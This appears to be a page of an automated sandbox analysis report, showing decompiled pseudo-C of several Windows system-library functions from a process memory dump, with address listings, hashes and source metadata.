											_t42 = _t102 + 0xc; // 0xc
											 *((intOrPtr*)(_t125 + 0x20)) = _t42;
											_v1048 =  *((intOrPtr*)(_t102 + 8));
											_push(_t111);
											 *((short*)(_t125 + 0x22)) =  *((intOrPtr*)(_t102 + 8));
											_push(0);
											_push( &_v1048);
											_t122 = E046313C0(_t102, _t118, _t122, __eflags);
											L44:
											_t118 = _v1072;
											goto L11;
										}
										_t122 = 0x80000002;
										goto L15;
									}
									_t122 = 0xc0000024;
									goto L44;
								}
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									goto L59;
								}
								_t118 = 8;
								__eflags = _t77 - _t118;
								if(_t77 != _t118) {
									goto L34;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
								if( *((intOrPtr*)(_t102 + 8)) != _t118) {
									goto L34;
								}
								_t112 = _v1056;
								_v1060 = _t118;
								__eflags = _t112;
								if(_t112 == 0) {
									goto L10;
								}
								 *_t112 =  *((intOrPtr*)(_t102 + 0xc));
								 *((intOrPtr*)(_t112 + 4)) =  *((intOrPtr*)(_t102 + 0x10));
								goto L11;
							}
							__eflags = _t114 - _t118;
							if(_t114 != _t118) {
								goto L59;
							}
							__eflags = _t77 - _t118;
							if(_t77 != _t118) {
								goto L34;
							}
							__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
							if( *((intOrPtr*)(_t102 + 8)) != _t118) {
								goto L34;
							}
							_t113 = _v1056;
							_v1060 = _t118;
							__eflags = _t113;
							if(_t113 == 0) {
								goto L10;
							}
							 *_t113 =  *((intOrPtr*)(_t102 + 0xc));
							goto L11;
						}
						_t118 =  *((intOrPtr*)(_t102 + 8));
						__eflags = _t118 - _a20;
						if(_t118 <= _a20) {
							_t114 =  *(_t102 + 4);
							_t77 = _t118;
							goto L26;
						}
						_v1060 = _t118;
						goto L10;
					}
					__eflags = _t122 - 0x80000005;
					if(_t122 != 0x80000005) {
						goto L15;
					}
					L046177F0( *( *[fs:0x30] + 0x18), 0, _t102);
					L18:
					_t121 = _v1060;
					goto L19;
				}
				_push( &_v1060);
				_push(0x400);
				_t102 =  &_v1036;
				_push(_t102);
				_push(2);
				_push( &_v1048);
				_push(_t116);
				_t122 = E04639650();
				if(_t122 >= 0) {
					__eflags = 0;
					_v1052 = 0;
					goto L7;
				}
				if(_t122 == 0x80000005) {
					goto L18;
				}
				goto L4;
			}

0x045fc608
0x045fc615
0x045fc625
0x045fc62d
0x045fc635
0x045fc640
0x045fc680
0x045fc687
0x045fc688
0x045fc689
0x045fc694
0x045fc694
0x045fc642
0x045fc64a
0x045fc697
0x04667a25
0x04667a2b
0x04667a2e
0x04667a30
0x04667bea
0x04667bea
0x00000000
0x04667bea
0x04667a36
0x04667a43
0x04667a48
0x04667a4c
0x04667a4e
0x00000000
0x00000000
0x04667a58
0x04667a5a
0x04667a5b
0x04667a5c
0x04667a5d
0x04667a63
0x04667a64
0x04667a6a
0x04667a6c
0x04667a6e
0x046679cb
0x046679cb
0x046679ce
0x046679d0
0x04667a98
0x04667a9b
0x04667a9b
0x04667a9e
0x04667aa1
0x04667bbe
0x04667bbe
0x04667bc0
0x04667be0
0x04667be0
0x04667a01
0x04667a01
0x04667a05
0x04667a07
0x04667a15
0x04667a15
0x04667a1a
0x00000000
0x04667a1a
0x04667bc2
0x04667bc6
0x04667bc9
0x04667bcd
0x04667bcf
0x046679e6
0x046679e6
0x046679eb
0x046679eb
0x046679ef
0x046679f1
0x00000000
0x00000000
0x046679f3
0x046679f5
0x046679ff
0x046679ff
0x00000000
0x046679ff
0x046679f7
0x046679fd
0x00000000
0x00000000
0x00000000
0x046679fd
0x04667bd5
0x04667bd8
0x00000000
0x00000000
0x04667ba9
0x04667bac
0x04667bb0
0x04667bb1
0x04667bb1
0x04667bb6
0x00000000
0x04667bb6
0x04667aa7
0x04667aaa
0x00000000
0x00000000
0x04667ab2
0x04667ab3
0x04667ab5
0x04667aec
0x04667aef
0x04667b25
0x04667b28
0x04667b62
0x04667b64
0x04667b8f
0x04667b92
0x04667b96
0x04667b98
0x00000000
0x00000000
0x04667b9e
0x04667b9f
0x04667ba3
0x00000000
0x04667ba3
0x04667b66
0x04667b68
0x04667ae2
0x04667ae2
0x00000000
0x04667ae2
0x04667b6e
0x04667b72
0x04667b75
0x04667b81
0x04667b85
0x04667b87
0x00000000
0x00000000
0x04667b31
0x04667b34
0x04667b3c
0x04667b45
0x04667b46
0x04667b4f
0x04667b51
0x04667b57
0x04667b59
0x04667b59
0x00000000
0x04667b59
0x04667b77
0x00000000
0x04667b77
0x04667b2a
0x00000000
0x04667b2a
0x04667af1
0x04667af3
0x00000000
0x00000000
0x04667afb
0x04667afc
0x04667afe
0x00000000
0x00000000
0x04667b00
0x04667b03
0x00000000
0x00000000
0x04667b05
0x04667b09
0x04667b0d
0x04667b0f
0x00000000
0x00000000
0x04667b18
0x04667b1d
0x00000000
0x04667b1d
0x04667ab7
0x04667ab9
0x00000000
0x00000000
0x04667abf
0x04667ac1
0x00000000
0x00000000
0x04667ac3
0x04667ac6
0x00000000
0x00000000
0x04667ac8
0x04667acc
0x04667ad0
0x04667ad2
0x00000000
0x00000000
0x04667adb
0x00000000
0x04667adb
0x046679d6
0x046679d9
0x046679dc
0x04667a91
0x04667a94
0x00000000
0x04667a94
0x046679e2
0x00000000
0x046679e2
0x04667a74
0x04667a7a
0x00000000
0x00000000
0x04667a8a
0x04667a21
0x04667a21
0x00000000
0x04667a21
0x045fc650
0x045fc651
0x045fc656
0x045fc65c
0x045fc65d
0x045fc663
0x045fc664
0x045fc66a
0x045fc66e
0x046679c5
0x046679c7
0x00000000
0x046679c7
0x045fc67a
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000007.00000002.508499448.00000000045D0000.00000040.00000001.sdmp, Offset: 045D0000, based on PE: true

Associated: 00000007.00000002.509039610.00000000046EB000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.509063992.00000000046EF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 452eea1f1f0fd927c75fa142bf009ace0f544a9747d349f07350cec53fcbbc2a
Instruction ID: 01dfa87bb8f7f171677da72972398030e5d9332cef406103028cdc9ffe2dee5b
Opcode Fuzzy Hash: 452eea1f1f0fd927c75fa142bf009ace0f544a9747d349f07350cec53fcbbc2a
Instruction Fuzzy Hash: 76818B756042469BDB25CE14C880A7AB3E9FF9435AF18496EED469B340F730FD41CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 0468B8D0, Relevance: .2, Instructions: 199
COMMON

Download Yara Rule

C-Code - Quality: 39%

			E0468B8D0(void* __edx, intOrPtr _a4, intOrPtr _a8, signed char _a12, signed int** _a16) {
				char _v8;
				signed int _v12;
				signed int _t80;
				signed int _t83;
				intOrPtr _t89;
				signed int _t92;
				signed char _t106;
				signed int* _t107;
				intOrPtr _t108;
				intOrPtr _t109;
				signed int _t114;
				void* _t115;
				void* _t117;
				void* _t119;
				void* _t122;
				signed int _t123;
				signed int* _t124;

				_t106 = _a12;
				if((_t106 & 0xfffffffc) != 0) {
					return 0xc000000d;
				}
				if((_t106 & 0x00000002) != 0) {
					_t106 = _t106 | 0x00000001;
				}
				_t109 =  *0x46e7b9c; // 0x0
				_t124 = L04614620(_t109 + 0x140000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t109 + 0x140000, 0x424 + (_a8 - 1) * 0xc);
				if(_t124 != 0) {
					 *_t124 =  *_t124 & 0x00000000;
					_t124[1] = _t124[1] & 0x00000000;
					_t124[4] = _t124[4] & 0x00000000;
					if( *((intOrPtr*)( *[fs:0x18] + 0xf9c)) == 0) {
						L13:
						_push(_t124);
						if((_t106 & 0x00000002) != 0) {
							_push(0x200);
							_push(0x28);
							_push(0xffffffff);
							_t122 = E04639800();
							if(_t122 < 0) {
								L33:
								if((_t124[4] & 0x00000001) != 0) {
									_push(4);
									_t64 =  &(_t124[1]); // 0x4
									_t107 = _t64;
									_push(_t107);
									_push(5);
									_push(0xfffffffe);
									E046395B0();
									if( *_t107 != 0) {
										_push( *_t107);
										E046395D0();
									}
								}
								_push(_t124);
								_push(0);
								_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
								L37:
								L046177F0();
								return _t122;
							}
							_t124[4] = _t124[4] | 0x00000002;
							L18:
							_t108 = _a8;
							_t29 =  &(_t124[0x105]); // 0x414
							_t80 = _t29;
							_t30 =  &(_t124[5]); // 0x14
							_t124[3] = _t80;
							_t123 = 0;
							_t124[2] = _t30;
							 *_t80 = _t108;
							if(_t108 == 0) {
								L21:
								_t112 = 0x400;
								_push( &_v8);
								_v8 = 0x400;
								_push(_t124[2]);
								_push(0x400);
								_push(_t124[3]);
								_push(0);
								_push( *_t124);
								_t122 = E04639910();
								if(_t122 != 0xc0000023) {
									L26:
									if(_t122 != 0x106) {
										L40:
										if(_t122 < 0) {
											L29:
											_t83 = _t124[2];
											if(_t83 != 0) {
												_t59 =  &(_t124[5]); // 0x14
												if(_t83 != _t59) {
													L046177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t83);
												}
											}
											_push( *_t124);
											E046395D0();
											goto L33;
										}
										 *_a16 = _t124;
										return 0;
									}
									if(_t108 != 1) {
										_t122 = 0;
										goto L40;
									}
									_t122 = 0xc0000061;
									goto L29;
								} else {
									goto L22;
								}
								while(1) {
									L22:
									_t89 =  *0x46e7b9c; // 0x0
									_t92 = L04614620(_t112,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t89 + 0x140000, _v8);
									_t124[2] = _t92;
									if(_t92 == 0) {
										break;
									}
									_t112 =  &_v8;
									_push( &_v8);
									_push(_t92);
									_push(_v8);
									_push(_t124[3]);
									_push(0);
									_push( *_t124);
									_t122 = E04639910();
									if(_t122 != 0xc0000023) {
										goto L26;
									}
									L046177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t124[2]);
								}
								_t122 = 0xc0000017;
								goto L26;
							}
							_t119 = 0;
							do {
								_t114 = _t124[3];
								_t119 = _t119 + 0xc;
								 *((intOrPtr*)(_t114 + _t119 - 8)) =  *((intOrPtr*)(_a4 + _t123 * 4));
								 *(_t114 + _t119 - 4) =  *(_t114 + _t119 - 4) & 0x00000000;
								_t123 = _t123 + 1;
								 *((intOrPtr*)(_t124[3] + _t119)) = 2;
							} while (_t123 < _t108);
							goto L21;
						}
						_push(0x28);
						_push(3);
						_t122 = E045FA7B0();
						if(_t122 < 0) {
							goto L33;
						}
						_t124[4] = _t124[4] | 0x00000001;
						goto L18;
					}
					if((_t106 & 0x00000001) == 0) {
						_t115 = 0x28;
						_t122 = E0468E7D3(_t115, _t124);
						if(_t122 < 0) {
							L9:
							_push(_t124);
							_push(0);
							_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
							goto L37;
						}
						L12:
						if( *_t124 != 0) {
							goto L18;
						}
						goto L13;
					}
					_t15 =  &(_t124[1]); // 0x4
					_t117 = 4;
					_t122 = E0468E7D3(_t117, _t15);
					if(_t122 >= 0) {
						_t124[4] = _t124[4] | 0x00000001;
						_v12 = _v12 & 0x00000000;
						_push(4);
						_push( &_v12);
						_push(5);
						_push(0xfffffffe);
						E046395B0();
						goto L12;
					}
					goto L9;
				} else {
					return 0xc0000017;
				}
			}

0x0468b8d9
0x0468b8e4
0x00000000
0x0468b8e6
0x0468b8f3
0x0468b8f5
0x0468b8f5
0x0468b8f8
0x0468b920
0x0468b924
0x0468b936
0x0468b939
0x0468b93d
0x0468b948
0x0468b9a0
0x0468b9a0
0x0468b9a4
0x0468b9bf
0x0468b9c4
0x0468b9c6
0x0468b9cd
0x0468b9d1
0x0468bad4
0x0468bad8
0x0468bada
0x0468badc
0x0468badc
0x0468badf
0x0468bae0
0x0468bae2
0x0468bae4
0x0468baec
0x0468baee
0x0468baf0
0x0468baf0
0x0468baec
0x0468bafb
0x0468bafc
0x0468bafe
0x0468bb01
0x0468bb01
0x00000000
0x0468bb06
0x0468b9d7
0x0468b9db
0x0468b9db
0x0468b9de
0x0468b9de
0x0468b9e4
0x0468b9e7
0x0468b9ea
0x0468b9ec
0x0468b9ef
0x0468b9f3
0x0468ba1b
0x0468ba1b
0x0468ba23
0x0468ba24
0x0468ba27
0x0468ba2a
0x0468ba2b
0x0468ba2e
0x0468ba30
0x0468ba37
0x0468ba3f
0x0468ba9c
0x0468baa2
0x0468bb13
0x0468bb15
0x0468baae
0x0468baae
0x0468bab3
0x0468bab5
0x0468baba
0x0468bac8
0x0468bac8
0x0468baba
0x0468bacd
0x0468bacf
0x00000000
0x0468bacf
0x0468bb1a
0x00000000
0x0468bb1c
0x0468baa7
0x0468bb11
0x00000000
0x0468bb11
0x0468baa9
0x00000000
0x00000000
0x00000000
0x00000000
0x0468ba41
0x0468ba41
0x0468ba41
0x0468ba58
0x0468ba5d
0x0468ba62
0x00000000
0x00000000
0x0468ba64
0x0468ba67
0x0468ba68
0x0468ba69
0x0468ba6c
0x0468ba6f
0x0468ba71
0x0468ba78
0x0468ba80
0x00000000
0x00000000
0x0468ba90
0x0468ba90
0x0468ba97
0x00000000
0x0468ba97
0x0468b9f5
0x0468b9f7
0x0468b9f7
0x0468b9fa
0x0468ba03
0x0468ba07
0x0468ba0c
0x0468ba10
0x0468ba17
0x00000000
0x0468b9f7
0x0468b9a6
0x0468b9a8
0x0468b9af
0x0468b9b3
0x00000000
0x00000000
0x0468b9b9
0x00000000
0x0468b9b9
0x0468b94d
0x0468b98f
0x0468b995
0x0468b999
0x0468b960
0x0468b967
0x0468b968
0x0468b96a
0x00000000
0x0468b96a
0x0468b99b
0x0468b99e
0x00000000
0x00000000
0x00000000
0x0468b99e
0x0468b951
0x0468b954
0x0468b95a
0x0468b95e
0x0468b972
0x0468b979
0x0468b97d
0x0468b97f
0x0468b980
0x0468b982
0x0468b984
0x00000000
0x0468b984
0x00000000
0x0468b926
0x00000000
0x0468b926

Memory Dump Source

Source File: 00000007.00000002.508499448.00000000045D0000.00000040.00000001.sdmp, Offset: 045D0000, based on PE: true

Associated: 00000007.00000002.509039610.00000000046EB000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.509063992.00000000046EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e22504b99e6cd2f65e8f8c6d3c67d3f604125bb268c7e0f45a7291f7d57c721f
Instruction ID: eb3304ac58d6b5f8eaddd20465db30b68e2060969602e5b44d8a3220cd31a994
Opcode Fuzzy Hash: e22504b99e6cd2f65e8f8c6d3c67d3f604125bb268c7e0f45a7291f7d57c721f
Instruction Fuzzy Hash: EB71FE72200B01AFEB31AF25C844F66BBE5EB44B24F14462CF6558B2A1FBB5F945CB50

Uniqueness

Uniqueness Score: -1.00%

Function 04676DC9, Relevance: .2, Instructions: 199
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E04676DC9(signed int __ecx, void* __edx) {
				unsigned int _v8;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				void* _t87;
				void* _t95;
				signed char* _t96;
				signed int _t107;
				signed int _t136;
				signed char* _t137;
				void* _t157;
				void* _t161;
				void* _t167;
				intOrPtr _t168;
				void* _t174;
				void* _t175;
				signed int _t176;
				void* _t177;

				_t136 = __ecx;
				_v44 = 0;
				_t167 = __edx;
				_v40 = 0;
				_v36 = 0;
				_v32 = 0;
				_v60 = 0;
				_v56 = 0;
				_v52 = 0;
				_v48 = 0;
				_v16 = __ecx;
				_t87 = L04614620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0x248);
				_t175 = _t87;
				if(_t175 != 0) {
					_t11 = _t175 + 0x30; // 0x30
					 *((short*)(_t175 + 6)) = 0x14d4;
					 *((intOrPtr*)(_t175 + 0x20)) =  *((intOrPtr*)(_t167 + 0x10));
					 *((intOrPtr*)(_t175 + 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t167 + 8)) + 0xc));
					 *((intOrPtr*)(_t175 + 0x28)) = _t136;
					 *((intOrPtr*)(_t175 + 0x2c)) =  *((intOrPtr*)(_t167 + 0x14));
					E04676B4C(_t167, _t11, 0x214,  &_v8);
					_v12 = _v8 + 0x10;
					_t95 = E04617D50();
					_t137 = 0x7ffe0384;
					if(_t95 == 0) {
						_t96 = 0x7ffe0384;
					} else {
						_t96 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t175);
					_push(_v12);
					_push(0x402);
					_push( *_t96 & 0x000000ff);
					E04639AE0();
					_t87 = L046177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t175);
					_t176 = _v16;
					if((_t176 & 0x00000100) != 0) {
						_push( &_v36);
						_t157 = 4;
						_t87 = E0467795D( *((intOrPtr*)(_t167 + 8)), _t157);
						if(_t87 >= 0) {
							_v24 = E0467795D( *((intOrPtr*)(_t167 + 8)), 1,  &_v44);
							_v28 = E0467795D( *((intOrPtr*)(_t167 + 8)), 0,  &_v60);
							_push( &_v52);
							_t161 = 5;
							_t168 = E0467795D( *((intOrPtr*)(_t167 + 8)), _t161);
							_v20 = _t168;
							_t107 = L04614620( *[fs:0x30],  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0xca0);
							_v16 = _t107;
							if(_t107 != 0) {
								_v8 = _v8 & 0x00000000;
								 *(_t107 + 0x20) = _t176;
								 *((short*)(_t107 + 6)) = 0x14d5;
								_t47 = _t107 + 0x24; // 0x24
								_t177 = _t47;
								E04676B4C( &_v36, _t177, 0xc78,  &_v8);
								_t51 = _v8 + 4; // 0x4
								_t178 = _t177 + (_v8 >> 1) * 2;
								_v12 = _t51;
								E04676B4C( &_v44, _t177 + (_v8 >> 1) * 2, 0xc78,  &_v8);
								_v12 = _v12 + _v8;
								E04676B4C( &_v60, _t178 + (_v8 >> 1) * 2, 0xc78,  &_v8);
								_t125 = _v8;
								_v12 = _v12 + _v8;
								E04676B4C( &_v52, _t178 + (_v8 >> 1) * 2 + (_v8 >> 1) * 2, 0xc78 - _v8 - _v8 - _t125,  &_v8);
								_t174 = _v12 + _v8;
								if(E04617D50() != 0) {
									_t137 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
								}
								_push(_v16);
								_push(_t174);
								_push(0x402);
								_push( *_t137 & 0x000000ff);
								E04639AE0();
								L046177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v16);
								_t168 = _v20;
							}
							_t87 = L04612400( &_v36);
							if(_v24 >= 0) {
								_t87 = L04612400( &_v44);
							}
							if(_t168 >= 0) {
								_t87 = L04612400( &_v52);
							}
							if(_v28 >= 0) {
								return L04612400( &_v60);
							}
						}
					}
				}
				return _t87;
			}

0x04676dd4
0x04676dde
0x04676de1
0x04676de3
0x04676de6
0x04676de9
0x04676dec
0x04676def
0x04676df2
0x04676df5
0x04676dfe
0x04676e04
0x04676e09
0x04676e0d
0x04676e18
0x04676e1b
0x04676e22
0x04676e2d
0x04676e30
0x04676e36
0x04676e42
0x04676e4d
0x04676e50
0x04676e55
0x04676e5c
0x04676e6e
0x04676e5e
0x04676e67
0x04676e67
0x04676e73
0x04676e74
0x04676e77
0x04676e7c
0x04676e7d
0x04676e8e
0x04676e93
0x04676e9c
0x04676ea8
0x04676eab
0x04676eac
0x04676eb3
0x04676ecd
0x04676edc
0x04676ee2
0x04676ee5
0x04676ef2
0x04676efb
0x04676f01
0x04676f06
0x04676f0b
0x04676f11
0x04676f1a
0x04676f22
0x04676f26
0x04676f26
0x04676f33
0x04676f41
0x04676f44
0x04676f47
0x04676f54
0x04676f65
0x04676f77
0x04676f7c
0x04676f82
0x04676f91
0x04676f99
0x04676fa3
0x04676fae
0x04676fae
0x04676fba
0x04676fbb
0x04676fbc
0x04676fc1
0x04676fc2
0x04676fd3
0x04676fd8
0x04676fd8
0x04676fdf
0x04676fe8
0x04676fee
0x04676fee
0x04676ff5
0x04676ffb
0x04676ffb
0x04677004
0x00000000
0x0467700a
0x04677004
0x04676eb3
0x04676e9c
0x04677015

Memory Dump Source

Source File: 00000007.00000002.508499448.00000000045D0000.00000040.00000001.sdmp, Offset: 045D0000, based on PE: true

Associated: 00000007.00000002.509039610.00000000046EB000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.509063992.00000000046EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
Instruction ID: 5ce02c905569872e8d16e2f1ccb257e79d096c1431df54fd27158e09043d7c0a
Opcode Fuzzy Hash: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
Instruction Fuzzy Hash: C0716971E00609AFDB11DFA8C984AEEBBB9FF48714F144169E505E7290EB34BA41CB94

Uniqueness

Uniqueness Score: -1.00%

Function 045F52A5, Relevance: .2, Instructions: 161
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E045F52A5(char __ecx) {
				char _v20;
				char _v28;
				char _v29;
				void* _v32;
				void* _v36;
				void* _v37;
				void* _v38;
				void* _v40;
				void* _v46;
				void* _v64;
				void* __ebx;
				intOrPtr* _t49;
				signed int _t53;
				short _t85;
				signed int _t87;
				signed int _t88;
				signed int _t89;
				intOrPtr _t101;
				intOrPtr* _t102;
				intOrPtr* _t104;
				signed int _t106;
				void* _t108;

				_t93 = __ecx;
				_t108 = (_t106 & 0xfffffff8) - 0x1c;
				_push(_t88);
				_v29 = __ecx;
				_t89 = _t88 | 0xffffffff;
				while(1) {
					E0460EEF0(0x46e79a0);
					_t104 =  *0x46e8210; // 0x931cc0
					if(_t104 == 0) {
						break;
					}
					asm("lock inc dword [esi]");
					 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)(_t104 + 8));
					E0460EB70(_t93, 0x46e79a0);
					if( *((char*)(_t108 + 0xf)) != 0) {
						_t101 =  *0x7ffe02dc;
						__eflags =  *(_t104 + 0x14) & 0x00000001;
						if(( *(_t104 + 0x14) & 0x00000001) != 0) {
							L9:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0x90028);
							_push(_t108 + 0x20);
							_push(0);
							_push(0);
							_push(0);
							_push( *((intOrPtr*)(_t104 + 4)));
							_t53 = E04639890();
							__eflags = _t53;
							if(_t53 >= 0) {
								__eflags =  *(_t104 + 0x14) & 0x00000001;
								if(( *(_t104 + 0x14) & 0x00000001) == 0) {
									E0460EEF0(0x46e79a0);
									 *((intOrPtr*)(_t104 + 8)) = _t101;
									E0460EB70(0, 0x46e79a0);
								}
								goto L3;
							}
							__eflags = _t53 - 0xc0000012;
							if(__eflags == 0) {
								L12:
								_t13 = _t104 + 0xc; // 0x931ccd
								_t93 = _t13;
								 *((char*)(_t108 + 0x12)) = 0;
								__eflags = E0462F0BF(_t13,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
								if(__eflags >= 0) {
									L15:
									_t102 = _v28;
									 *_t102 = 2;
									 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
									E0460EEF0(0x46e79a0);
									__eflags =  *0x46e8210 - _t104; // 0x931cc0
									if(__eflags == 0) {
										__eflags =  *((char*)(_t108 + 0xe));
										_t95 =  *((intOrPtr*)(_t108 + 0x14));
										 *0x46e8210 = _t102;
										_t32 = _t102 + 0xc; // 0x0
										 *_t95 =  *_t32;
										_t33 = _t102 + 0x10; // 0x0
										 *((intOrPtr*)(_t95 + 4)) =  *_t33;
										_t35 = _t102 + 4; // 0xffffffff
										 *((intOrPtr*)(_t95 + 8)) =  *_t35;
										if(__eflags != 0) {
											_t95 =  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10))));
											E04674888(_t89,  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10)))), __eflags);
										}
										E0460EB70(_t95, 0x46e79a0);
										asm("lock xadd [esi], eax");
										if(__eflags == 0) {
											_push( *((intOrPtr*)(_t104 + 4)));
											E046395D0();
											L046177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										asm("lock xadd [esi], ebx");
										__eflags = _t89 == 1;
										if(_t89 == 1) {
											_push( *((intOrPtr*)(_t104 + 4)));
											E046395D0();
											L046177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										_t49 = _t102;
										L4:
										return _t49;
									}
									E0460EB70(_t93, 0x46e79a0);
									asm("lock xadd [esi], eax");
									if(__eflags == 0) {
										_push( *((intOrPtr*)(_t104 + 4)));
										E046395D0();
										L046177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
										_t102 =  *((intOrPtr*)(_t108 + 0x10));
									}
									 *_t102 = 1;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										_t28 = _t102 + 4; // 0xffffffff
										_push( *_t28);
										E046395D0();
										L046177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t102);
									}
									continue;
								}
								_t93 =  &_v20;
								 *((intOrPtr*)(_t108 + 0x20)) =  *((intOrPtr*)(_t104 + 0x10));
								_t85 = 6;
								_v20 = _t85;
								_t87 = E0462F0BF( &_v20,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
								__eflags = _t87;
								if(_t87 < 0) {
									goto L3;
								}
								 *((char*)(_t108 + 0xe)) = 1;
								goto L15;
							}
							__eflags = _t53 - 0xc000026e;
							if(__eflags != 0) {
								goto L3;
							}
							goto L12;
						}
						__eflags = 0x7ffe02dc -  *((intOrPtr*)(_t108 + 0x14));
						if(0x7ffe02dc ==  *((intOrPtr*)(_t108 + 0x14))) {
							goto L3;
						} else {
							goto L9;
						}
					}
					L3:
					_t49 = _t104;
					goto L4;
				}
				_t49 = 0;
				goto L4;
			}

0x045f52a5
0x045f52ad
0x045f52b0
0x045f52b3
0x045f52b7
0x045f52ba
0x045f52bf
0x045f52c4
0x045f52cc
0x00000000
0x00000000
0x045f52ce
0x045f52d9
0x045f52dd
0x045f52e7
0x045f52f7
0x045f52f9
0x045f52fd
0x04650dcf
0x04650dd5
0x04650dd6
0x04650dd7
0x04650dd8
0x04650dd9
0x04650dde
0x04650ddf
0x04650de0
0x04650de1
0x04650de2
0x04650de5
0x04650dea
0x04650dec
0x04650f60
0x04650f64
0x04650f70
0x04650f76
0x04650f79
0x04650f79
0x00000000
0x04650f64
0x04650df2
0x04650df7
0x04650e04
0x04650e0d
0x04650e0d
0x04650e10
0x04650e1a
0x04650e1c
0x04650e4c
0x04650e52
0x04650e61
0x04650e67
0x04650e6b
0x04650e70
0x04650e76
0x04650ed7
0x04650edc
0x04650ee0
0x04650ee6
0x04650eea
0x04650eed
0x04650ef0
0x04650ef3
0x04650ef6
0x04650ef9
0x04650efe
0x04650f01
0x04650f01
0x04650f0b
0x04650f12
0x04650f16
0x04650f18
0x04650f1b
0x04650f2c
0x04650f31
0x04650f31
0x04650f35
0x04650f39
0x04650f3a
0x04650f3c
0x04650f3f
0x04650f50
0x04650f55
0x04650f55
0x04650f59
0x045f52eb
0x045f52f1
0x045f52f1
0x04650e7d
0x04650e84
0x04650e88
0x04650e8a
0x04650e8d
0x04650e9e
0x04650ea3
0x04650ea3
0x04650ea7
0x04650eaf
0x04650eb3
0x04650eb9
0x04650eb9
0x04650ebc
0x04650ecd
0x04650ecd
0x00000000
0x04650eb3
0x04650e21
0x04650e2b
0x04650e2f
0x04650e30
0x04650e3a
0x04650e3f
0x04650e41
0x00000000
0x00000000
0x04650e47
0x00000000
0x04650e47
0x04650df9
0x04650dfe
0x00000000
0x00000000
0x00000000
0x04650dfe
0x045f5303
0x045f5307
0x00000000
0x045f5309
0x00000000
0x045f5309
0x045f5307
0x045f52e9
0x045f52e9
0x00000000
0x045f52e9
0x045f530e
0x00000000

Memory Dump Source

Source File: 00000007.00000002.508499448.00000000045D0000.00000040.00000001.sdmp, Offset: 045D0000, based on PE: true

Associated: 00000007.00000002.509039610.00000000046EB000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.509063992.00000000046EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: af6a43fb56a5b0cd8586c03405e3edc3ba85b2c2f3fa078ad50ec264f4e9afc2
Instruction ID: 300f694323f8f6919a40a622ef03575cce3b47632441487d0cb2b78b8472916e
Opcode Fuzzy Hash: af6a43fb56a5b0cd8586c03405e3edc3ba85b2c2f3fa078ad50ec264f4e9afc2
Instruction Fuzzy Hash: 0E51BA71205341ABE321EF68C940B2BBBE4FF40714F144A2EE995876A2F774F844CB96

Uniqueness

Uniqueness Score: -1.00%

Function 04622AE4, Relevance: .2, Instructions: 159
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04622AE4(intOrPtr* __ecx, intOrPtr __edx, signed int _a4, short* _a8, intOrPtr _a12, signed int* _a16) {
				signed short* _v8;
				signed short* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr* _v28;
				signed int _v32;
				signed int _v36;
				short _t56;
				signed int _t57;
				intOrPtr _t58;
				signed short* _t61;
				intOrPtr _t72;
				intOrPtr _t75;
				intOrPtr _t84;
				intOrPtr _t87;
				intOrPtr* _t90;
				signed short* _t91;
				signed int _t95;
				signed short* _t96;
				intOrPtr _t97;
				intOrPtr _t102;
				signed int _t108;
				intOrPtr _t110;
				signed int _t111;
				signed short* _t112;
				void* _t113;
				signed int _t116;
				signed short** _t119;
				short* _t120;
				signed int _t123;
